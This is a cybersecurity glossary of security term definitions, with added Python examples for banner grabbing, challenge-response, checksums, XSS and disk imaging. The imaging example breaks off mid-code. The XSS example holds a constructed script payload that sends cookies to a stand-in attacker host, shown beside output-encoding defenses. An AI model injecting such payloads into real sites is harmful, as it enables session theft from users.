The Glossary

Cybersecurity Glossary

Cybrary’s cybersecurity glossary provides the cybersecurity community with knowledge of and insight on the industry’s significant terms and definitions. This list contains key terminology and is one of the most extensive cybersecurity glossary/vocabulary resources online. Start your search on the critical terms you need to know as a security professional.


Acceptable interruption window 1
An acceptable interruption window is the maximum time allowed for restoration, when interrupted, of critical systems or applications of an organization, so that its business goals are not negatively affected.
Acceptable interruption window 2
The maximum amount of time a business can function without its critical systems or applications before the goals of the organization are negatively affected.
Acceptable use policy
Acceptable use policy is a policy that defines the level of access and degree of use of the organization’s network or internet by the members of an organization.
Access control list acl
An access control list is an ordered set of rules that tells a system which users or groups may perform which operations on an object, so that the operating system (or application) can decide whether a given user ID has permission to access a file, directory, or other resource. Rules are evaluated in order and, in a well-designed ACL, anything not explicitly allowed is denied.
Access path
An access path is the logical sequence of names (for example directory names or URL components) that leads to the location on a computer where an object such as a web page or file is stored.
Access point
An access point is a networking device that allows a Wi-Fi compliant device to connect to a wired network; it usually connects to the rest of the network through a router or switch.
Access profile
An access profile is the information about a user that a system stores, including the user name, authentication credentials (ideally a password hash rather than the password itself), and what the user is allowed to access.
Access rights
Access rights are the privileges or permissions granted to a user or a program to read, alter, edit, or delete files and other resources stored on a system or network.
Access type
An access type is the kind of operation a subject is permitted to perform on an object, such as read, write, execute, append, modify, delete, or create. Access rights are expressed as a set of access types on a given object.
User account management
User account management is the set of methods used to create, manage, and authenticate users, and to disable or remove accounts when they are no longer needed.
Accountability
Accountability is the ability to trace an action performed on a system back to the user, process, or application that performed it.
Accounting legend code
An accounting legend code is a numeric code used to indicate the minimum accounting controls required for accountable communications security (COMSEC) material within the COMSEC material control system.
Active security testing
Active security testing is security testing that involves directly interacting with a target, such as by sending packets to it.
Ad hoc network
An ad hoc network is a local area network (LAN) that forms spontaneously as devices connect to one another. An ad hoc network does not rely on a base station or access point to coordinate the nodes; instead, the nodes themselves forward packets to and from each other.
Administrative safeguards
Administrative safeguards are one of the three categories of safeguards (administrative, physical, and technical) in the HIPAA Security Rule. Administrative safeguards focus on internal organization, policies and procedures, and the maintenance of the security measures that are in place to protect sensitive patient information.
Advanced encryption standard aes
The Advanced Encryption Standard is a symmetric block cipher, standardized by NIST in FIPS 197, that encrypts 128-bit blocks of data using a key of 128, 192, or 256 bits. AES is used to protect highly sensitive data such as financial information and classified government records.
Advanced penetration testing
Advanced penetration testing is the process of testing a network to discover vulnerabilities that leave it open to intruders, and then addressing and remedying those issues.
Advanced persistent threat apt
An advanced persistent threat is a well-resourced adversary, often state-sponsored, that uses highly sophisticated techniques to gain and maintain long-term, covert access to a target network in pursuit of a malicious objective such as espionage or data theft.
Adversary
An adversary is a process, user, or device that poses a threat to a network or system.
Adware
Adware is software distributed to the user free of charge with advertisements embedded in it. It displays advertisements and may redirect queries to sponsors' websites. Adware often helps advertisers collect data for marketing purposes without the user's permission. In some cases the ad pop-ups can be disabled by purchasing a registration key.
Alert situation
An alert situation occurs when an interruption in an enterprise is still not resolved after the threshold stage has been completed; an alert situation requires the enterprise to start its escalation procedure.
Alternate facilities
Alternate facilities are secondary facilities, including offices and data processing centers, from which high-priority emergency tasks can be performed and delivered when the primary facilities are interrupted or unavailable.
Alternate process
An alternate process is a backup process devised to keep a business-critical process running without interruption, from the time the primary enterprise system fails until the time it is restored.
Analog
An analog signal is a continuously varying transmission signal, typically represented as a sine wave, that carries information in its amplitude (signal strength) or frequency. The peaks and troughs of the wave denote signal strength, while the length of one cycle of the wave (its period) determines its frequency.
Anti malware
Anti-malware is software designed to protect computers and networks against malicious programs such as viruses, worms, adware, spyware, and similar threats.
Anti virus software
Antivirus software is a program or a set of programs that helps prevent malicious objects, code, or programs from entering a computer or network. If such a program does get in, antivirus software helps detect, quarantine, or remove it from the computer or network.
App attack
An app attack occurs when a user unknowingly installs a harmful app on their tablet or smartphone and the app in turn steals their personal data.
Application layer
The application layer is the topmost of the seven layers of the Open Systems Interconnection (OSI) model, and also the top layer of the TCP/IP protocol suite. The application layer defines how process-to-process communication happens across a network and offers the communication interface and services used directly by end-user programs (for example HTTP, SMTP, and DNS).
Architecture
Architecture is a structure that defines or describes the fundamentals of a system or an organization: its components, the relationships between those components and to the overall system, and finally how effectively they guide the system toward its goals.
Asset
An asset is a resource of an organization or business, either of tangible value (finance, infrastructure, physical property, human resources) or of intangible value (such as goodwill), that supports the business and can be converted to cash for future use.
Asymmetric key public key
An asymmetric key (public key) scheme uses a mathematically related pair of keys to protect a message. One key, the public key, encrypts the message, and only the other, the private key, can decrypt it; the private key cannot feasibly be derived from the public key. The same pair is used in reverse for digital signatures: the private key signs and the public key verifies.
Attack mechanism
An attack mechanism is a system or strategy by which a target is hit; the attacker may use different attack mechanisms such as a container or payload to hit the intended target.
Attack vector
An attack vector is the path or means by which an attacker gains entry into a target system, such as a phishing email, an unpatched network service, or stolen credentials. Attackers frequently exploit the human element or the weakest link to gain such access.
Attack
An attack is an action with malicious intent to interrupt the operations of a network, steal data, or otherwise compromise a system.
Attenuation
Attenuation is the weakening of signal strength, analog or digital, especially when a signal is transmitted over long distances.
Audit trail
An audit trail is a detailed, chronological record of transactions that lets you trace a piece of information back to its origin. In computing, an audit trail (or log) supports security monitoring, forensic investigation, and recovery of lost data; to be trustworthy it must itself be protected from tampering.
Authentication
Authentication is the process of verifying that a claimed identity is genuine. In computing, it is the process of confirming the identity of a person or system using credentials such as a username and password, a token, or a certificate. Once authenticated, individuals and systems can be granted authorization based on their identity.
Authenticity
Authenticity is the property that a claimed identity (whether of a human or a resource) is real and legitimate, and can be proven to be so.
Availability
Availability is the property that a system or resource is accessible and usable on demand by authorized users; it is often measured as the fraction of time the system is operational.
Backdoor
A backdoor or trapdoor is a hidden means of bypassing normal authentication to gain access to a computer or network. A programmer may leave one in place to bypass security steps during development or maintenance; attackers also plant backdoors so they can re-enter compromised computers or networks without proper permission.
Bandwidth
Bandwidth is the volume of data that can pass through a network connection in a given period, usually measured in bits per second.
Banner grabbing
Banner grabbing is the reconnaissance technique of connecting to a remote port and recording the identifying information, such as the application type and version, that the service sends when the connection is initiated. Attackers and auditors use the result to identify software with known vulnerabilities.
Banner
A banner is a display on an information system that sets the parameters for system or data use.
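As an added example (not code from the glossary or from any scanning tool), the following Python starts a throwaway TCP listener on 127.0.0.1 that greets each client with a constructed SSH-style banner, then grabs and parses that banner the way a scanner would. The banner text, the loopback host and the port are constructed for the demo; against a real host the same grab_banner call would be pointed at its address and a service port such as 22, 25 or 80 (HTTP stays silent until asked, so for it you pass a probe such as a HEAD request).

```python
import socket
import threading

# Constructed banner for the fake local service; this is not a real host's response.
FAKE_BANNER = b"SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.6\r\n"


def start_fake_service(banner: bytes = FAKE_BANNER) -> int:
    """Bind a listener on 127.0.0.1 (OS-chosen port) that sends `banner` to every client.
    Returns the port so the grabber knows where to connect."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                conn.sendall(banner)

    threading.Thread(target=serve, daemon=True).start()
    return port


def grab_banner(host: str, port: int, timeout: float = 2.0, probe: bytes = b"") -> str:
    """Connect, optionally send a probe (e.g. b'HEAD / HTTP/1.0\\r\\n\\r\\n' for HTTP),
    and return whatever the service volunteers first. An empty string means it said nothing."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        if probe:
            s.sendall(probe)
        s.settimeout(timeout)
        try:
            data = s.recv(1024)
        except socket.timeout:
            data = b""
    return data.decode("ascii", errors="replace").strip()


def parse_ssh_banner(banner: str) -> dict:
    """Split 'SSH-protoversion-softwareversion [comments]' (the RFC 4253 identification string).
    Returns an empty dict for anything that is not an SSH banner."""
    if not banner.startswith("SSH-"):
        return {}
    head, _, comments = banner.partition(" ")
    parts = head.split("-", 2)
    if len(parts) < 3:
        return {}
    return {"protocol": parts[1], "software": parts[2], "comments": comments}


if __name__ == "__main__":
    port = start_fake_service()
    banner = grab_banner("127.0.0.1", port)
    print(banner, parse_ssh_banner(banner))
```

The version string is the whole point: once the software and version are known, the next step is a lookup for published vulnerabilities, which is also why hardening guides recommend trimming or genericizing banners where the protocol allows it.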
Baseline security
Baseline security is the minimum set of security controls required for safeguarding an IT system. It is based upon the system's identified needs for confidentiality, integrity, and availability protection.
Bastion host
A bastion host is a special services computer on a network that is designed to withstand attacks.
Bastion
A bastion is a system with a high level of security protection; such a system offers very strong protection against attacks.
Behavioral outcome
A behavioral outcome is what an individual who has completed a specific training module is expected to accomplish on regular IT security job performance.
Biometrics
Biometrics are a security technology that identifies a person by unique physiological characteristics, such as fingerprints, iris or facial features, or DNA.
Bit error rate
A bit error rate is the ratio between the number of bits incorrectly received and the total number of bits transmitted in a telecommunications system.
Black core
A black core is a communication network architecture in which user data traversing an Internet Protocol (IP) network is end-to-end encrypted at the IP layer, so that the core network carries only ciphertext.
Blended attack
A blended attack is a hostile action that spreads malicious code via multiple methods at once, for example combining a worm, a Trojan, and an exploit of a software vulnerability.
Block cipher algorithm
A block cipher algorithm is a family of functions and their inverses parameterized by a cryptographic key in which the function maps bit strings of a fixed length to bit strings of the same length.
Block cipher
A block cipher is a method of encrypting data in fixed-size blocks (for example 128 bits for AES) rather than one bit or byte at a time. Messages longer than one block are handled by a mode of operation such as CBC or GCM, and a message that does not fill its last block must be padded.
Botnet
A botnet is a remotely controlled network of compromised computers set up to carry out attacks such as spam, malware distribution, or denial of service against target computers or networks. Attackers use malicious programs to take control of computers and enroll them in the botnet; the owners of such member computers are often unaware that their computer carries and forwards such a threat.
Boundary 1
A boundary is a fence or an imaginary line, which indicates the limit of an organization, and its relationship with its neighbors.
Boundary 2
The physical and/or logical perimeter of a system.
Bridge
A bridge is a device that connects two network segments that use the same protocol, such as Ethernet or Token Ring, into one logical network. Operating at the data link layer of the OSI model, a bridge learns which MAC addresses sit on each side and forwards frames only to the segment where the destination lies, or discards them, which reduces the volume of traffic on each segment.
Bring your own device
Bring your own device (byod) is a policy of the organization allowing its employees to use their personal devices such as smartphones, tablet PCs, laptops for business purposes.
Broadcast
A broadcast is a process of transmitting the same message to multiple users simultaneously.
Brute force attack
A brute force attack is the process of finding a secret such as a password or decryption key by systematically trying every possible candidate until the correct one is found; its cost grows with the size of the search space, which is why long, random passwords and keys resist it.
Brute force
Brute force is a computing method that finds a solution by exhaustively enumerating all possible candidates rather than by exploiting any structure of the problem; it is guaranteed to succeed eventually but can be prohibitively slow.
Buffer overflow
A buffer overflow occurs when a program writes more data to a buffer than the buffer can hold. Because a buffer has a fixed size, the surplus data spills into adjacent memory, overwriting whatever was stored there and triggering unpredictable behavior; attackers exploit this to corrupt control data and execute code of their choosing.
Business continuity plan
A business continuity plan is also known as a business emergency plan, it offers safeguards against a disaster, and outlines the strategies, action plan on how to continue business as usual in the event of any disaster.
Business impact analysis assessment
A business impact analysis/assessment is the process of identifying and evaluating the risks and threats that a business might face in the event of an accident, disaster, or emergency. It evaluates the possible impact on tangible and intangible assets such as personnel, infrastructure, data, and goodwill, and identifies the steps needed to recover from any such disaster.
Category
A category is a restrictive label applied to classified or unclassified information to limit access.
Central services node
A central services node is the key management infrastructure core node that provides central security management and data management services.
Certificate authority ca
A certificate authority (ca) is an independent third party that verifies the online identity of an entity. They issue digital certificates that contain information about the owner of the certificate and details of the certificates, thus verifying the identity of the owner.
Certificate management
Certificate management is the process in which certificates are generated, used, transmitted, loaded and destroyed.
Certificate revocation list crl
A certificate revocation list (CRL) is a signed list, published by a certificate authority, of certificates that have been revoked before their expiry date (for example because the private key was compromised) and should no longer be trusted. A relying party should check a certificate against the issuer's CRL, or an OCSP responder, before accepting it.
Chain of custody
A chain of custody is the documented, unbroken record of how evidence was collected, who handled it, and where it was stored, which must be maintained for the evidence to be legally accepted. The collector identifies and labels the evidence, seals it so that tampering is evident, and records each person who had access to it until it is presented in a court of law.
Chain of evidence
The chain of evidence shows who obtained the evidence, where the evidence came from, also who secured, had control and possession of the evidence. The chain of evidence goes in the following order: collection and identification; analysis; storage; preservation; presentation in court; return to owner.
Challenge response protocol
A challenge-response protocol is a kind of authentication protocol in which the verifier sends the claimant a fresh, unpredictable challenge. The claimant generates a response by hashing the challenge together with a shared secret, or by applying a private key operation to it, and sends the response to the verifier. The verifier checks the response to establish that the claimant controls the secret, which itself never crosses the wire.
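The exchange described above, as an added Python example (not code from the glossary or from any authentication library), using HMAC-SHA256 over a shared secret. Both sides are modelled so the messages are visible: the verifier sends a random nonce, the claimant returns HMAC(secret, nonce), and the verifier recomputes and compares in constant time. The shared secret is a constructed constant; the nonce bookkeeping shows the two checks a practitioner wants, single use (so a captured response cannot be replayed) and expiry.

```python
import hashlib
import hmac
import secrets
import time

# Constructed shared secret for the demo; real deployments provision a per-client secret out of band.
SHARED_SECRET = b"s3cret-provisioned-out-of-band"


class Verifier:
    """Holds the secret, issues challenges, and checks responses."""

    def __init__(self, secret: bytes, ttl_seconds: float = 30.0):
        self._secret = secret
        self._ttl = ttl_seconds
        self._outstanding = {}   # nonce -> time issued; an entry is removed the first time it is used

    def issue_challenge(self) -> bytes:
        nonce = secrets.token_bytes(16)   # fresh and unpredictable: this is what defeats replay
        self._outstanding[nonce] = time.monotonic()
        return nonce

    def verify(self, nonce: bytes, response: bytes) -> bool:
        issued = self._outstanding.pop(nonce, None)   # single use: a replayed nonce finds no entry
        if issued is None or time.monotonic() - issued > self._ttl:
            return False
        expected = hmac.new(self._secret, nonce, hashlib.sha256).digest()
        return hmac.compare_digest(expected, response)   # constant-time compare, no early exit on mismatch


class Claimant:
    """Proves possession of the secret without ever sending it."""

    def __init__(self, secret: bytes):
        self._secret = secret

    def respond(self, nonce: bytes) -> bytes:
        return hmac.new(self._secret, nonce, hashlib.sha256).digest()


def run_exchange(verifier: Verifier, claimant: Claimant) -> tuple:
    """One full round trip. Only `nonce` and `response` would travel over the network."""
    nonce = verifier.issue_challenge()          # verifier -> claimant
    response = claimant.respond(nonce)          # claimant -> verifier
    return nonce, response, verifier.verify(nonce, response)


if __name__ == "__main__":
    v, c = Verifier(SHARED_SECRET), Claimant(SHARED_SECRET)
    nonce, response, ok = run_exchange(v, c)
    print(nonce.hex(), response.hex(), ok)
```

An eavesdropper sees only nonce/response pairs, which reveal nothing about the secret; what the scheme does not provide is protection against an attacker who obtains the verifier's secret store, which is why password-based variants hash or derive the stored value and public key variants keep no secret on the verifier at all.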
Checksum
A checksum is a numerical value that helps to check that data received or read is the same as the data sent or stored, so that the recipient has error-free data. It is often the sum of the numerical values of the bytes of the data; the value computed at the recipient's end should match the value sent, and a mismatch indicates an error. A plain checksum detects accidental corruption but not deliberate tampering, since an attacker can recompute it.
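An added Python example (not code from the glossary) showing what a sum-of-bytes checksum does and does not catch, compared with CRC32 and SHA-256. The payloads are constructed: one has a single corrupted byte, one has two bytes swapped, and attacker_fixup shows how trivially a tampered message can be made to pass an additive checksum.

```python
import hashlib
import zlib


def additive_checksum(data: bytes) -> int:
    """Classic sum-of-bytes checksum folded into one byte (mod 256)."""
    return sum(data) % 256


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def detects(check, original: bytes, received: bytes) -> bool:
    """True if the check value computed over `received` differs from the one that accompanied `original`."""
    return check(original) != check(received)


def attacker_fixup(modified: bytes, target_sum: int) -> bytes:
    """Append one byte chosen so the additive checksum of the tampered message equals the original's."""
    return modified + bytes([(target_sum - sum(modified)) % 256])


# Constructed sample payloads
ORIGINAL = b"transfer 100.00 to account 4242"
BIT_FLIP = ORIGINAL.replace(b"100.00", b"900.00")    # one byte corrupted in transit
TRANSPOSED = ORIGINAL.replace(b"4242", b"2424")      # two bytes swapped: same sum, different meaning


if __name__ == "__main__":
    for name, check in (("additive", additive_checksum), ("crc32", zlib.crc32), ("sha256", sha256_hex)):
        print(name, "bit flip:", detects(check, ORIGINAL, BIT_FLIP),
              "transposition:", detects(check, ORIGINAL, TRANSPOSED))
    forged = attacker_fixup(BIT_FLIP, additive_checksum(ORIGINAL))
    print("forged message passes additive checksum:", additive_checksum(forged) == additive_checksum(ORIGINAL))
```

The additive sum misses the transposition because addition is commutative; CRC32 catches it because the CRC depends on byte position, but CRC32 is just as easy for an attacker to recompute. When the threat is an adversary rather than line noise, integrity needs a keyed MAC or a digital signature, not a checksum.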
Chief information security officer
A chief information security officer is a senior level executive of an organization entrusted with the responsibilities of protecting the information assets of the businesses and making sure that the information policies of the organization align with the objectives of the organization.
Chief security officer
A chief security officer is an executive of the company with assigned responsibility to protect assets such as the infrastructure, personnel, including information in digital and physical form.
Cipher text
Cipher text is data converted from plain text into code using an algorithm, making it unreadable without the key.
Cipher
A cipher is a process to convert data into code, or encrypt it, with the help of an algorithm; a key is required to decipher the code.
Ciphony
Ciphony is the process of enciphering audio information, with the result being encrypted speech.
Claimant
A claimant is the party whose identity is to be verified via an authentication protocol.
Cleartext
Cleartext is data that is not encoded or encrypted, whether text or binary; it can be read by any application or machine that processes it.
Clinger cohen act 1996
The Clinger-Cohen Act, also known as the Information Technology Management Reform Act, made significant changes to the way that federal IT resources are managed and procured. Its most significant aspect is the requirement that each agency design and implement a process for maximizing the value, and assessing and managing the risks, of its IT investments.
Cloud computing
Cloud computing is a platform that utilizes shared resources to access information, data, etc., rather than local servers. Information is stored on, and retrieved from the cloud or internet. Cloud computing allows remote sharing of files, data and facilitates remote working, as long as users are connected to the internet.
Cold site
A cold site is a backup facility that has the basic infrastructure (space, power, cooling, and often furniture and telephones) but no computer equipment installed. Because hardware must be shipped in, set up, and loaded with data, a cold site takes longer to bring into operation than a warm or hot site, typically days rather than hours. It is essentially a backup facility ready to receive computer equipment should operations need to move to an alternate location.
Collision
A collision occurs when two or more devices, such as computers or networking devices, try to transmit on the same shared medium at the same time, so that their signals interfere and the data must be resent.
Common access card cac
A common access card is a standard identification/smart card issued by the department of defense. A common access card has an embedded integrated chip storing public key infrastructure (pki) certificates.
Common attack pattern enumeration and classification capec
Common Attack Pattern Enumeration and Classification (CAPEC) is a community-developed catalog, published by the MITRE Corporation, of common attack patterns that describes how vulnerable systems are attacked and how such attacks are executed.
Compartmentalization
Compartmentalization is a technique of protecting confidential information by revealing it only to the few people who actually need to know the details to perform their job. By restricting access to information in this way, the risk to business objectives is limited.
Compliance documents
A compliance document is a document detailing the actions required to comply or adhere to the set standards by regulatory bodies. Any violations of the said rules attract punitive actions from the regulatory bodies.
Compliance
Compliance is the act of abiding by, and adhering to the set standards, rules, and laws of the land, or of any such regulatory bodies, authorities. In the software field, for example, development of software adheres to certain standards set by the quality and standards body, and installation process abides by the vendor license agreement.
Computer emergency response team cert
A computer emergency response team (CERT) is a team formed to study the vulnerabilities of an organization's information systems, to respond to security incidents, and to offer solutions and strategies for addressing such vulnerabilities. Such teams are highly organized, with clearly defined roles and responsibilities.
Computer forensics
Computer forensics is the process of analyzing and investigating computer devices, when they are suspected of having been used in a cybercrime, with the aim of gathering evidence for presentation in a court of law. Computer forensics offers many tools for investigation and analysis to uncover such evidence.
Confidentiality
Confidentiality is the set of rules that places restrictions on access to, or sharing of, information with the aim of preserving and protecting its privacy.
Configuration management
Configuration management is the process of entering, editing, updating information relating to an organization’s hardware and software. Every detail such as the version of software installed, updates applied to the software, and the location of the devices, etc., is recorded, updated regularly.
Consumerization
Consumerization refers to new trends or changes in enterprise technology as more and more consumers embrace such technology. Employees use devices for personal use and as they gain wide acceptance, even organizations start using such technologies.
Containment
Containment is steps taken to control any further risks upon identifying a threat.
Content filtering
Content filtering is a process by which access to certain content, information, data is restricted, limited, or completely blocked based on organization’s rules. Any objectionable email, website, etc., is blocked using either software or hardware based tools.
Control 1
Control is the set of policies, strategies, guidelines, etc., established in collaboration with the various departments of an organization, such as management, legal, and technical, to help mitigate risk.
Control 2
A policy that guarantees an organization that the systems are reliable, and work in accordance with the established rules. It also assures that the organization complies with all the standards and rules as established by various authorities.
Countermeasure
A countermeasure is a defensive mechanism that helps mitigate risk, threat, to a network or computers, using a process, system or a device.
Critical infrastructure
Critical infrastructure is the fundamental system of an organization that is important for its survival, any threat to such basic systems would push the entire organization into jeopardy.
Criticality analysis
Criticality analysis is evaluating the importance of an asset or information to an organization; and the effects its failure would have on the overall performance of the organization.
Criticality
Criticality is the level of importance assigned to an asset or information. The organization may not function effectively and efficiently in the absence of an asset or information that is highly critical.
Cross site scripting xss
Cross-site scripting is an attack in which malicious script is injected into pages served by a trusted and otherwise secure website, so that the script runs in the browsers of other users of that site with their privileges. Attackers target websites that do not properly validate or encode user input before including it in a page.
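As an added example (not code from the glossary or from any web framework), the following Python shows a server-side template that pastes user input straight into HTML beside the hardened version that output-encodes it, for both the HTML body and an attribute value. The two payloads are constructed attacker inputs; looks_executable is a crude string check used only to make the difference visible, not a real XSS detector.

```python
import html

# Constructed attacker inputs
BODY_PAYLOAD = '<script>new Image().src="http://attacker.example/c?"+document.cookie</script>'
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.domain)'


def render_vulnerable(username: str) -> str:
    """Untrusted input pasted straight into the HTML body: the victim's browser runs the payload."""
    return f"<p>Welcome back, {username}!</p>"


def render_hardened(username: str) -> str:
    """Output-encode for the HTML body context: <, >, &, \" and ' become entities,
    so the browser shows the payload as text instead of parsing it as markup."""
    return f"<p>Welcome back, {html.escape(username, quote=True)}!</p>"


def render_attribute_vulnerable(username: str) -> str:
    """Even inside a quoted attribute, an unescaped quote lets the input close the value and add an event handler."""
    return f'<input name="user" value="{username}">'


def render_attribute_hardened(username: str) -> str:
    """Attribute context needs both quoting and escaping; html.escape with quote=True (the default) covers the quotes."""
    return f'<input name="user" value="{html.escape(username)}">'


def looks_executable(markup: str) -> bool:
    """Demo-only check: a raw <script tag, or an on* handler that escaped the attribute value."""
    lower = markup.lower()
    return "<script" in lower or ' onfocus="' in lower


if __name__ == "__main__":
    for renderer, payload in ((render_vulnerable, BODY_PAYLOAD), (render_hardened, BODY_PAYLOAD),
                              (render_attribute_vulnerable, ATTR_PAYLOAD), (render_attribute_hardened, ATTR_PAYLOAD)):
        out = renderer(payload)
        print(renderer.__name__, looks_executable(out), out)
```

Encoding is context-specific: html.escape is right for the HTML body and for quoted attributes, but input landing inside a script block, a URL, or a CSS value needs the encoder for that context, and a Content-Security-Policy that forbids inline script is the defense in depth for the cases the encoder misses.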
Cryptography
Cryptography is the science and art of protecting the privacy of information by encrypting it into a secret code, so that no one but an authorized person holding the decryption key can read or view the information.
Cryptosystem
A cryptosystem is a system or algorithm to encrypt plain text into cipher text in order to protect the privacy of stored information. A key is used to convert plain text to cipher text and vice versa.
Cyber security architecture
Cyber security architecture is the information security layout that describes the overall structure, including its various components, and their relationships in an organization. It displays how strong the data security, controls and preventive mechanisms implemented in the organization are.
Cyber security
Cyber security is the set of processes employed to safeguard and secure the assets that carry an organization's information from being stolen or attacked. It requires extensive knowledge of possible threats such as viruses and other malicious objects. Identity management, risk management, and incident management form the crux of an organization's cyber security strategy.
Cybercop
A cybercop is a law enforcement officer entrusted with the responsibility of monitoring online activities to control criminal activities online, or cybercrimes.
Cyber Espionage
Cyber espionage is spying on the computer systems of an organization, using malware or other unauthorized intrusions, to steal or destroy data and information. Such spying is unauthorized and happens in a clandestine manner.
Cyber warfare
Cyber warfare is conflict conducted through attacks on computer systems and networks, typically by a nation state or its proxies, to disrupt, damage, or spy on an adversary's information systems, critical infrastructure, or economy.
Data asset
A data asset is any entity that is composed of data; for example, a database is an example of a data asset. A system or application output file, database, document, or web page are also considered data assets. Data assets can also be a service that may be provided to access data from an application.
Data classification
Data classification is a data management process that involves categorizing and organizing data into different classes based on their forms, types, importance, sensitivity, and usage in an organization.
Data custodian
A data custodian is a person or team in an organization entrusted with the day-to-day responsibilities of data administration; protecting and safeguarding data in accordance with the rules set by the data owner is the primary responsibility of a data custodian.
Data element
A data element is a basic unit of information that has a unique meaning and subcategories (data items) of distinct value. Gender, race, and geographic location are all examples of data elements.
Data encryption standard
The Data Encryption Standard (DES) is a symmetric block cipher that converts plain text to cipher text in 64-bit blocks using a 56-bit key; because it uses the same key to encrypt and decrypt, it is a symmetric key algorithm. Its short key length makes it vulnerable to brute force attack, and it has been superseded by AES.
Data flow control
Data flow control is another term for information flow control.
Data leakage
Data leakage is the accidental or intentional transfer and distribution of private and confidential information of an organization without its knowledge or the permission.
Data owner
A data owner is an executive of an organization entrusted with administrative control of a set of data. The owner has complete control over that data, can grant or limit access to it and assign permissions, and is accountable for its accuracy and integrity.
Data retention
Data retention is the process of storing and protecting data for historical reasons and for data back up when needed. Every organization has its own rules governing data retention within the organization.
Data transfer device dtd
A data transfer device is a fill device designed to securely store, transport, and transfer electronically both comsec and transec keys. A dtd is designed to be backward compatible with the previous generation of comsec common fill devices, and programmable to support modern mission systems.
Database
A database is a systematic collection and organization of data by individuals or organizations so that it can be easily stored, retrieved, and edited for future use.
Decentralization
Decentralization is the process of distributing functions and authority among different people or to different locations.
Decryption key
A decryption key is the piece of secret data that is required to decipher, or convert, encrypted text or information back into plain text.
Decryption
Decryption is the process of decoding cipher text to plain text so it is readable by the user. It is the opposite of encryption, the process of converting plain text to cipher text.
Defense in depth
Defense in depth is the process of creating multiple layers of security to protect electronics and information resources against attackers. Also called the castle approach, it is based on the principle that in the event of an attack, even if one layer fails to protect the information resource other layers can offer defense against the attack.
Demilitarized zone
A demilitarized zone (DMZ) is a separate network segment, bounded by firewalls, that sits between an organization's internal LAN and the outside world or the Internet. It hosts resources such as public web and mail servers that must be reachable from outside, while keeping the internal LAN private and accessible only to authorized personnel; if a DMZ host is compromised, the attacker still has no direct access to the internal network.
Denial of service attack
A denial of service attack is an attack on a network or machine intended to make it unavailable to its legitimate users. The attacker floods the network or server with requests, keeping it busy and unavailable to other users, or exploits a flaw that crashes the service.
Digital certificate
A digital certificate is a signed data structure that binds a public key to the identity of its owner, so that a recipient can verify that the sender is who they claim to be. Issued by a certificate authority, a digital certificate helps parties exchange information over the Internet in a safe and secure manner.
Digital evidence
Digital evidence is electronic information stored or transferred in digital form.
Digital forensics
Digital forensics is the process of procuring, analyzing, interpreting electronic data for the purpose of presenting it as an acceptable evidence in a legal proceedings in a court of law.
Digital signature
A digital signature is an electronic code that guarantees that the sender of information is who they claim to be, and that the information has not been altered since it was signed. Digital signatures are computed with the sender's private key and verified with the corresponding public key, so they cannot easily be imitated or forged.
Disaster recovery plan
A disaster recovery plan (DRP) prescribes the steps required to restore IT systems and data after a disaster and carry on business as usual; it is usually one component of the broader business continuity plan (BCP). A disaster recovery plan aims to bring business activities back to normal in the shortest possible time; such efforts require an in-depth study and analysis of business-critical processes and their continuity needs. Business continuity plans also prescribe preventive measures to avoid disasters in the first place.
Disaster
A disaster is a sudden event or catastrophe, caused by the forces of nature or by human error, that results in serious damage to nature, society, human life, or property. In a business or commercial sense, a disaster disables an enterprise from delivering its essential tasks for a specified period; for organizations, disasters may result in loss of resources and assets, including data.
Discretionary access control
Discretionary access control is a security measure, by which the owner can restrict the access of the resources such as files, devices, directories to specific subjects or users or user groups based on their identity. It is the discretion of the owner to grant permission or restrict users from accessing the resources completely or partially.
Disk imaging
Disk imaging is the process of generating a bit-for-bit copy of the original media, including free space and slack space.
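An added Python example (not code from the glossary or from any forensic tool) of what "bit-for-bit, including free space and slack space" means in practice. It fabricates a small "device" file consisting of one allocated block followed by free space that still holds the remnant of a deleted note, images it block by block while hashing, verifies the image against the source, and contrasts the result with an ordinary file copy. The device contents and file names are constructed for the demo.

```python
import hashlib
import os
import tempfile

BLOCK_SIZE = 4096   # copy and hash in device-block-sized chunks


def sha256_of_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(BLOCK_SIZE), b""):
            h.update(chunk)
    return h.hexdigest()


def image_device(source: str, dest: str) -> tuple:
    """Bit-for-bit copy of `source` into `dest`, hashing the bytes as they are read.
    Returns (bytes_copied, acquisition_hash); the hash is what goes into the chain-of-custody record."""
    h = hashlib.sha256()
    copied = 0
    with open(source, "rb") as src, open(dest, "wb") as dst:
        for chunk in iter(lambda: src.read(BLOCK_SIZE), b""):
            dst.write(chunk)
            h.update(chunk)
            copied += len(chunk)
    return copied, h.hexdigest()


def verify_image(source: str, dest: str, acquisition_hash: str) -> bool:
    """Evidence-grade only if the source, the image and the hash recorded at acquisition all agree."""
    return sha256_of_file(source) == sha256_of_file(dest) == acquisition_hash


def make_fake_device(path: str) -> int:
    """Constructed 'disk': one allocated 4 KiB file, then free space holding a deleted note, then zeros."""
    allocated = b"invoice.pdf: %PDF-1.4 ...".ljust(BLOCK_SIZE, b"A")
    remnant = b"deleted_note.txt: wire the funds to account 4242 before Friday"
    free_space = remnant.ljust(3 * BLOCK_SIZE, b"\x00")
    with open(path, "wb") as f:
        f.write(allocated + free_space)
    return len(allocated) + len(free_space)


def logical_copy(source: str, dest: str, allocated_bytes: int = BLOCK_SIZE) -> None:
    """What an ordinary file copy captures: only the allocated data, never free or slack space."""
    with open(source, "rb") as src, open(dest, "wb") as dst:
        dst.write(src.read(allocated_bytes))


def demo() -> dict:
    with tempfile.TemporaryDirectory() as workdir:
        device = os.path.join(workdir, "device.raw")
        image = os.path.join(workdir, "device.dd")
        copy = os.path.join(workdir, "logical.bin")
        size = make_fake_device(device)
        copied, acquisition_hash = image_device(device, image)
        logical_copy(device, copy)
        with open(image, "rb") as f:
            image_bytes = f.read()
        with open(copy, "rb") as f:
            copy_bytes = f.read()
        return {
            "device_size": size,
            "bytes_copied": copied,
            "verified": verify_image(device, image, acquisition_hash),
            "remnant_in_image": b"deleted_note.txt" in image_bytes,
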